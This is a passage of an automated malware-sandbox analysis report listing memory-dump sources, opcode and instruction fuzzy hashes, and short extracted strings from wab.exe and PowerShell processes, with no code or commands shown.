                                          Wow64 process (32bit):true
                                          Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                                          Imagebase:0x930000
                                          File size:516'608 bytes
                                          MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Reset < >
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.20482532489.00007FFB20080000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB20080000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_7ffb20080000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1ed099a8f775019c402acfa96a8092eaf729a017a483c2c4a9104622d9ef9bc5
                                            • Instruction ID: 9c1826626d1f99638b0e1c0b35615040af4cc5eba8f7ccaaa59395549e4445f0
                                            • Opcode Fuzzy Hash: 1ed099a8f775019c402acfa96a8092eaf729a017a483c2c4a9104622d9ef9bc5
                                            • Instruction Fuzzy Hash: 4CF1917091CA8D8FEBA9DF28C8467EA37E1FB54310F04466AE84DC7395DB34A9458B81
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000006.00000002.20482532489.00007FFB20080000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB20080000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_7ffb20080000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b3308493bb819539af08d6cc1b2eee04092747d418c6bbcff7ea14380f660213
                                            • Instruction ID: 4e608db82abc18bf1b97b6d8848e5b2f0fbc5848594c098b1a705d12a47789c5
                                            • Opcode Fuzzy Hash: b3308493bb819539af08d6cc1b2eee04092747d418c6bbcff7ea14380f660213
                                            • Instruction Fuzzy Hash: 1BE1E47090CA8D8FEBA9DF28CC55BEA37E1FB54350F04426ED84DC7295CE38A8458B81
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.20483683142.00007FFB20150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB20150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_7ffb20150000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: HRX$HRX$ZM_H
                                            • API String ID: 0-2037701925
                                            • Opcode ID: e14348dbd25917db6cb3af7585c228967b3f85d41422a056640e75e50e65f945
                                            • Instruction ID: f020deb11ddcb23d1e6ba9ff33bd5a33b53f0e49b7db9df1e3c1766d8b2dba81
                                            • Opcode Fuzzy Hash: e14348dbd25917db6cb3af7585c228967b3f85d41422a056640e75e50e65f945
                                            • Instruction Fuzzy Hash: 08E12BB291DACA4FE796DB78CC561B87FE1FF55395F0801BAE04DDB293CA2898058341
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.20483683142.00007FFB20150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB20150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_7ffb20150000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: HRX
                                            • API String ID: 0-2762880927
                                            • Opcode ID: 88959aa65aace881265477ac165791dae92c712afb3096b4ffb0112f41dc018f
                                            • Instruction ID: 1c8b432a09ef4e6b4bb80133f22817ee66f7b6cb2e83eebcc12779ca0e665dc5
                                            • Opcode Fuzzy Hash: 88959aa65aace881265477ac165791dae92c712afb3096b4ffb0112f41dc018f
                                            • Instruction Fuzzy Hash: A7B139A2A2DAC94FE796D67CDC651B87FD1EF45392B0801FBE04DCB293E9189C458381
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000006.00000002.20482532489.00007FFB20080000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB20080000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_7ffb20080000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d86c1ecb80d49c4133692240de585d9ac4b6e47c201c71229ebf68d4d6b1f4e9
                                            • Instruction ID: 0bbcda30d2bebab1f32abd44aa42e79f9ed4c8187c280d3f5f51c3b58dcfdee3
                                            • Opcode Fuzzy Hash: d86c1ecb80d49c4133692240de585d9ac4b6e47c201c71229ebf68d4d6b1f4e9
                                            • Instruction Fuzzy Hash: 67815A71A1CA894FE789EB2CC885AB5B7E1FF94351F10057DD08AC3296DE35E846C780
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000006.00000002.20483683142.00007FFB20150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB20150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_7ffb20150000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2583a842277de98601dc6afe552f33b40c56793457513cc3640f62b6a470e8c0
                                            • Instruction ID: 0786c786bb552ff0486bc18c7955a8afc1bf4d5011a9a0cd3ba8ee1a9e3264aa
                                            • Opcode Fuzzy Hash: 2583a842277de98601dc6afe552f33b40c56793457513cc3640f62b6a470e8c0
                                            • Instruction Fuzzy Hash: 4051D4A2D2DADA0FE7E6D678DC521787EE1FF55395B5800B9F04DDB2A2CD28AC048341
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000006.00000002.20483683142.00007FFB20150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB20150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_7ffb20150000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f117f9fea5a7f8c5cca48d52590c25bc39f4005831ed9b83041fca32fbf75ce4
                                            • Instruction ID: 54d8320cad01271036ff6f75cbd8138faac62bc21f5c27c80ea7f43f72417a60
                                            • Opcode Fuzzy Hash: f117f9fea5a7f8c5cca48d52590c25bc39f4005831ed9b83041fca32fbf75ce4
                                            • Instruction Fuzzy Hash: 2231B892D2DAC60FE3E696789C651787ED1EF453E2B5801BAF44DCB2D2ED0CAC444341
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000006.00000002.20482532489.00007FFB20080000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB20080000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_7ffb20080000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e26e880e1d71fe7436f510caca523963cd19ce89c1addea80b81cc1ac8720924
                                            • Instruction ID: 6936e3a2029a5e046e0aec8a99716950cd35dc92adc60391d2d15f7b8b221e21
                                            • Opcode Fuzzy Hash: e26e880e1d71fe7436f510caca523963cd19ce89c1addea80b81cc1ac8720924
                                            • Instruction Fuzzy Hash: 0001677111CB0C4FD744EF0CE451AA6B7E0FB95324F10056DE58AC3655D636E892CB45
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.20083796189.0000000004C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_4c50000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: \Vj
                                            • API String ID: 0-3251626932
                                            • Opcode ID: 4bde3a740624df63907cc0269fc71526b356b66e267983b47965f47842c45072
                                            • Instruction ID: 2259e0a176ee0877d698dd90794c1a5dcc7bbefb2f621e61a4ce001f344e414a
                                            • Opcode Fuzzy Hash: 4bde3a740624df63907cc0269fc71526b356b66e267983b47965f47842c45072
                                            • Instruction Fuzzy Hash: ABB17170E00209CFDF10DFA9C88579EBBF3AF88344F148529D815E72A4EB74A991CB95
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.20083796189.0000000004C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_4c50000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 429ab449ab9d0b79473666eb1f8a8ca62c593ab98d1f78bdb2ee7d76ceae899f
                                            • Instruction ID: 6cc1551c8d4140a416f5766ef93517f4df76ac4eefe9a558cabd911f15315fee
                                            • Opcode Fuzzy Hash: 429ab449ab9d0b79473666eb1f8a8ca62c593ab98d1f78bdb2ee7d76ceae899f
                                            • Instruction Fuzzy Hash: 9AB177B0E00209CFDF10DFA9D8857AEBBF3AF88314F148569D815E7264EB74A985CB45
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.20093652335.0000000007BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_7bb0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: (.3k$4[Bl$4[Bl$4[Bl$4[Bl$4\Bl$4\Bl$4\Bl$4\Bl$4\Bl$4\Bl$4\Bl$4\Bl$@bBl$@bBl$@bBl$@bBl$@bBl$@bBl$@bBl$@bBl$\}=l$\}=l
                                            • API String ID: 0-370465294
                                            • Opcode ID: 137a39bb3219c3b2e026fce15167d737d03972443559f73cfa9248361b08a00e
                                            • Instruction ID: 108d4031a691b6e6c0b61f6f74b192a3072144fc16daf75dd806c247cff385e2
                                            • Opcode Fuzzy Hash: 137a39bb3219c3b2e026fce15167d737d03972443559f73cfa9248361b08a00e
                                            • Instruction Fuzzy Hash: CA626FB4B00215DFEB24CB94C851FAAB7B2EF85304F1485A9D909AF345CBB1AC81CF91
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.20093652335.0000000007BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_7bb0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Al$ Al$(.3k$4\Bl$4\Bl$4\Bl$4\Bl$4\Bl$4\Bl$4\Bl$@bBl$@bBl$@bBl$@bBl$@bBl$@bBl$@bBl$@bBl$\}=l$\}=l
                                            • API String ID: 0-2964019923
                                            • Opcode ID: dc2017a8305cc7d4afd3a3d7d05f6a52deecf945f03433962a0c3e867031dca5
                                            • Instruction ID: 9c92070a1cf063882ba42676f21fe6af2fe0783a143804fff53da14ad0fc2243
                                            • Opcode Fuzzy Hash: dc2017a8305cc7d4afd3a3d7d05f6a52deecf945f03433962a0c3e867031dca5
                                            • Instruction Fuzzy Hash: 15623AB4B00205DFE764CB98C981EA9B7B2EF89314F14C0A9E9059F359DBB1EC46CB45
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.20097290183.0000000009090000.00000040.00000800.00020000.00000000.sdmp, Offset: 09090000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_9090000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Al$ Al$$rBl$$rBl$GBl$GBl$GBl$GBl$GBl$GBl$GBl$GBl
                                            • API String ID: 0-2573627332
                                            • Opcode ID: fbaba2c6b72c0dbd6401c63b7d3db4a18bbb13b5a1a716e723c089edab022568
                                            • Instruction ID: 0966aa0e4d6d163dc3c40ae85621d9bd0c66b6b6b47dfa3cb823fc0179f7278a
                                            • Opcode Fuzzy Hash: fbaba2c6b72c0dbd6401c63b7d3db4a18bbb13b5a1a716e723c089edab022568
                                            • Instruction Fuzzy Hash: C4225536B143018FDF959B688812B7ABBF2AFC1350F14C8BAE545CF291DA35C841DBA1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.20093652335.0000000007BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_7bb0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4[Bl$4[Bl$4[Bl$4[Bl$4\Bl$4\Bl$4\Bl$4\Bl$@bBl$@bBl$@bBl$@bBl
                                            • API String ID: 0-2662300500
                                            • Opcode ID: ea94c7fd5eadf2f78871e4365cbf4d335f7ca0b17d3c9a5840ee274718f448a4
                                            • Instruction ID: 1fdabab4f7cbc7e836ae48f413a3a28c9c0ea2e4d2bfe7cb72abb6688bb79ce3
                                            • Opcode Fuzzy Hash: ea94c7fd5eadf2f78871e4365cbf4d335f7ca0b17d3c9a5840ee274718f448a4
                                            • Instruction Fuzzy Hash: ECB19EB4B00245ABE724DBA4C941FAAB7F3EF85300F1085A9E9016F396CBB5DC45CB55
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.20093652335.0000000007BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_7bb0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: (.3k$4[Bl$4[Bl$4[Bl$4[Bl$4[Bl$4[Bl$4[Bl$4[Bl
                                            • API String ID: 0-3661533114
                                            • Opcode ID: 2ccc0947f0006cfaa10c340f80cfa7ce260151723cb34414fd0ea23517ae3938
                                            • Instruction ID: 6d70fb2998d30d025915c8923447dd2828f36fa470ee45c6ffec5b4ab1fd06bb
                                            • Opcode Fuzzy Hash: 2ccc0947f0006cfaa10c340f80cfa7ce260151723cb34414fd0ea23517ae3938
                                            • Instruction Fuzzy Hash: 3E627DB4A002199FEB64DB64CD51BEEBBB2EF84304F1080E5E9086B385CB759D81CF95
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.20093652335.0000000007BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_7bb0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Al$(.3k$4\Bl$4\Bl$4\Bl$@bBl$@bBl$@bBl$\}=l
                                            • API String ID: 0-1330487816
                                            • Opcode ID: 5d5a7f5d1b18b1884d842639ca6ea5fb27e2f3607d27a523e254be76c0659681
                                            • Instruction ID: 4aca0ed92988be20eb76ba092425ffe6fa4839f5d236cfe23bcebe7d3e424000
                                            • Opcode Fuzzy Hash: 5d5a7f5d1b18b1884d842639ca6ea5fb27e2f3607d27a523e254be76c0659681
                                            • Instruction Fuzzy Hash: 67125BB4B00205DFEB64CB98C981EA9BBB2EF84314F14C1A9E9059F355D7B2EC56CB41
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.20093652335.0000000007BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_7bb0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: (.3k$4\Bl$4\Bl$4\Bl$@bBl$@bBl$@bBl$\}=l
                                            • API String ID: 0-3987185361
                                            • Opcode ID: d6aec3299b144264612841bd32ad2cbe88d355d3de9e423638280f745595f82c
                                            • Instruction ID: ddfec018242cac97311172aba71264b5b998043efe132768dd69c83fc968b588
                                            • Opcode Fuzzy Hash: d6aec3299b144264612841bd32ad2cbe88d355d3de9e423638280f745595f82c
                                            • Instruction Fuzzy Hash: 87321AB4B00205DFEB64CB98C985EA9BBB2EF89314F14C199E9059F356C7B2EC45CB41
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.20093652335.0000000007BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_7bb0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4[Bl$4[Bl$4[Bl$4[Bl$4[Bl$4\Bl$@bBl$@bBl
                                            • API String ID: 0-616448546
                                            • Opcode ID: ad8b04fb12399ed62c8242d7e5a3639f3c24f8f6a15c04cf60d6275cf74a28f6
                                            • Instruction ID: 19af0af503af42c4cb57f810926a0999501022f43212ff31585cb6817956c607
                                            • Opcode Fuzzy Hash: ad8b04fb12399ed62c8242d7e5a3639f3c24f8f6a15c04cf60d6275cf74a28f6
                                            • Instruction Fuzzy Hash: D6F1ADB4B002159FE724DB64CC91FAAB7B3EF84304F1080E9E909AF395DA759D81CB95
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.20093652335.0000000007BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_7bb0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4[Bl$4[Bl$4[Bl$4[Bl$4[Bl$4[Bl$4[Bl$4[Bl
                                            • API String ID: 0-2716301089
                                            • Opcode ID: a4d42702f2b8c1a80068b29ac78764d80b29b73ed52b587d556693e3721a282d
                                            • Instruction ID: 4b7ecd7d8463ae2ea0eb73a88c8e776f6ecfdefe68121c8a2061b21b8b9b3cb1
                                            • Opcode Fuzzy Hash: a4d42702f2b8c1a80068b29ac78764d80b29b73ed52b587d556693e3721a282d
                                            • Instruction Fuzzy Hash: 37D17DB4B002059FE714DBA8C851BAEBBB2EFC4304F14C0A6E9056F395DAB5D846CB95
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.20093652335.0000000007BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_7bb0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: P0@l$P0@l$P0@l$P0@l$\}=l$\}=l$GBl$GBl
                                            • API String ID: 0-1437473239
                                            • Opcode ID: e923ce32779eecdd50c344b0d8bb014ee3f5138d90e5740dbcaad78250451bec
                                            • Instruction ID: cfeba495c0482372454ca858716f511f01a815de2cfeefde46e80490cf9383e6
                                            • Opcode Fuzzy Hash: e923ce32779eecdd50c344b0d8bb014ee3f5138d90e5740dbcaad78250451bec
                                            • Instruction Fuzzy Hash: 0391A2B5B002159BEB34CF58C450BFAB7A2FFC5210F5885A9E9469B3A0DBB1DC41CB91
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.20093652335.0000000007BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_7bb0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Al$4[Bl$4[Bl$4\Bl$4\Bl$@bBl$@bBl
                                            • API String ID: 0-2045761570
                                            • Opcode ID: 1c4521c58ba3a8860fbc7ca0d67a2f04c9916550496037859c08a88f13538397
                                            • Instruction ID: bc18840d5fbbae9add3d0db52e236fc7a371cc87892ccb3120fc99fd382d09c3
                                            • Opcode Fuzzy Hash: 1c4521c58ba3a8860fbc7ca0d67a2f04c9916550496037859c08a88f13538397
                                            • Instruction Fuzzy Hash: 41024DB4A002599FEB64DB64CD41BEDBBB2EF84304F1081E5E909AB341CB759E81CF95
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.20093652335.0000000007BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_7bb0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4[Bl$4[Bl$4\Bl$4\Bl$@bBl$@bBl
                                            • API String ID: 0-699112395
                                            • Opcode ID: dc03f0766bfe8f85e050a30a2b843466bbeb55cecbf0afcfca1b803f61a3a2f1
                                            • Instruction ID: 5a0ea8cd4b24e4265445530079d9d3288fbf639216e0576daaeaba0fd6bea1d1
                                            • Opcode Fuzzy Hash: dc03f0766bfe8f85e050a30a2b843466bbeb55cecbf0afcfca1b803f61a3a2f1
                                            • Instruction Fuzzy Hash: 82A18FF4B00245AFEB24CBA4C981FA9B7B2FF85314F1085A9E9046F352CB76AC45CB55
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.20093652335.0000000007BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_7bb0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4[Bl$4[Bl$4\Bl$4\Bl$@bBl$@bBl
                                            • API String ID: 0-699112395
                                            • Opcode ID: ceda5a7148adf235bb69bbb717a2111a9284d43ffa03d728d39c81edf0437cc3
                                            • Instruction ID: 47618ebdbd208c27a663777c4780a90d81dbf364c502d570bd06db5d31e42467
                                            • Opcode Fuzzy Hash: ceda5a7148adf235bb69bbb717a2111a9284d43ffa03d728d39c81edf0437cc3
                                            • Instruction Fuzzy Hash: 66A18FF4B00245AFE724CBA4C981FA9BBB2FF85314F1085A9E9046F352CB76AC45CB55
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.20093652335.0000000007BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_7bb0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4[Bl$4[Bl$4[Bl$4\Bl$@bBl
                                            • API String ID: 0-1592145127
                                            • Opcode ID: a66f1510fbfb2718702b68e50a505162f311c8de40412b540efb1667ae74f8c3
                                            • Instruction ID: e29ce094dccea70d7cc3494e66c2fd0b52276564ecf7c0d9316f40d3525c6db2
                                            • Opcode Fuzzy Hash: a66f1510fbfb2718702b68e50a505162f311c8de40412b540efb1667ae74f8c3
                                            • Instruction Fuzzy Hash: E0E171B4B002159FEB54DB64CC95FAEBBA2EF84304F1080E9E909AF391CA759D81CF55
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.20093652335.0000000007BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_7bb0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4[Bl$4[Bl$4[Bl$4[Bl
                                            • API String ID: 0-2625575403
                                            • Opcode ID: b36a7d9ac6774ef060c2f8b7a0ae1681566c9294956d70711724014cb79cae34
                                            • Instruction ID: 7bb2c2b3a9dceae65d1d31481817d13f3a1f0a0b9155bc637ec4f94f3321a69a
                                            • Opcode Fuzzy Hash: b36a7d9ac6774ef060c2f8b7a0ae1681566c9294956d70711724014cb79cae34
                                            • Instruction Fuzzy Hash: EEB17DB4B002059FEB24CBA4C841BAEBBB2EFC4304F14C1A6E9056F355DB75E846CB95
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.20093652335.0000000007BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_7bb0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $wBl$GBl$GBl
                                            • API String ID: 0-1295360308
                                            • Opcode ID: 52d5d9c521abfa602635bcf6f34e6eb1c07720a2158b6bf79d3430e6f1fef0c1
                                            • Instruction ID: b3839ec587caae7cf5cc16f044d589d9aee3304f05ec7602c54b1ae358a4e82f
                                            • Opcode Fuzzy Hash: 52d5d9c521abfa602635bcf6f34e6eb1c07720a2158b6bf79d3430e6f1fef0c1
                                            • Instruction Fuzzy Hash: F91136F6E04242CFFB31A66288056F3F790EF82250F0484E6CD914B141D6B4CA40CA91
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.20093652335.0000000007BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_7bb0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: GBl$GBl
                                            • API String ID: 0-1297038760
                                            • Opcode ID: 7710ff91f558fb6f82391e790dc63af5cb6558cad2de71da263a4453431f723f
                                            • Instruction ID: f3e877818c56698cd166d9be79d07393b807176a7b225a8465b49926767abb4c
                                            • Opcode Fuzzy Hash: 7710ff91f558fb6f82391e790dc63af5cb6558cad2de71da263a4453431f723f
                                            • Instruction Fuzzy Hash: 6B3124F5B052028BEB3896B448117FAF396DBC1211F2484FADD52CB2A1DEB5C842C7A1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.20097290183.0000000009090000.00000040.00000800.00020000.00000000.sdmp, Offset: 09090000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_9090000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $rBl$GBl
                                            • API String ID: 0-2326765698
                                            • Opcode ID: a86405bd1f1ec1ae2b22b25df401dc3e4278bceccf5f45b8c88425cc42926e25
                                            • Instruction ID: 5b2b0d592909ce20733dd58c76aa60020c72f034c65478e978404b687ae54021
                                            • Opcode Fuzzy Hash: a86405bd1f1ec1ae2b22b25df401dc3e4278bceccf5f45b8c88425cc42926e25
                                            • Instruction Fuzzy Hash: D84113B1B10200CFDF94CE288442B7A7BF6AF94350B18C8A9E904AB251D735D845EBA2
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.20093652335.0000000007BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_7bb0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $wBl$$wBl
                                            • API String ID: 0-4291246965
                                            • Opcode ID: 7b0f0afd806cb4e4da7fc0aae1221ee2787ace63bf1ffb9d2f93cbf5eb18593e
                                            • Instruction ID: 92a036a288e4b973f1ecec6ea2350b3125e20fbcb1bbfc47b84f206a2abd1546
                                            • Opcode Fuzzy Hash: 7b0f0afd806cb4e4da7fc0aae1221ee2787ace63bf1ffb9d2f93cbf5eb18593e
                                            • Instruction Fuzzy Hash: 1A3127F5F002128BFB34A6A598156FBF392DFC1250B1484BADE018B241DEB58D01CBE1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.20083796189.0000000004C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_4c50000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: \Vj
                                            • API String ID: 0-3251626932
                                            • Opcode ID: 9e9f84cd6f899e4ade68435bc3fcd40e680debac0d1442e378a10dae522ee844
                                            • Instruction ID: 2467456e1801dee33bb9d10d7b0cc630e65cbe76ce85eb7e0ae7f07628956eb7
                                            • Opcode Fuzzy Hash: 9e9f84cd6f899e4ade68435bc3fcd40e680debac0d1442e378a10dae522ee844
                                            • Instruction Fuzzy Hash: 36B17170E00209CFDF10DFA9C8857DEBBF2AF48344F148529E815E7264EB74A995CBA5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.20083796189.0000000004C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_4c50000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9db5488a4622c15f860a8e300296ddf77753f026378b4dfbede387387d4d0aa4
                                            • Instruction ID: e9cbde4518a028a58d9203d0e6534eed87e12b3c4e6ac5e8a5a7f3b51584ee4e
                                            • Opcode Fuzzy Hash: 9db5488a4622c15f860a8e300296ddf77753f026378b4dfbede387387d4d0aa4
                                            • Instruction Fuzzy Hash: 1B020875A00219DFDB15DF98D484AAEBBB2FF48310F248569E805AB361D731EE81CB94
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
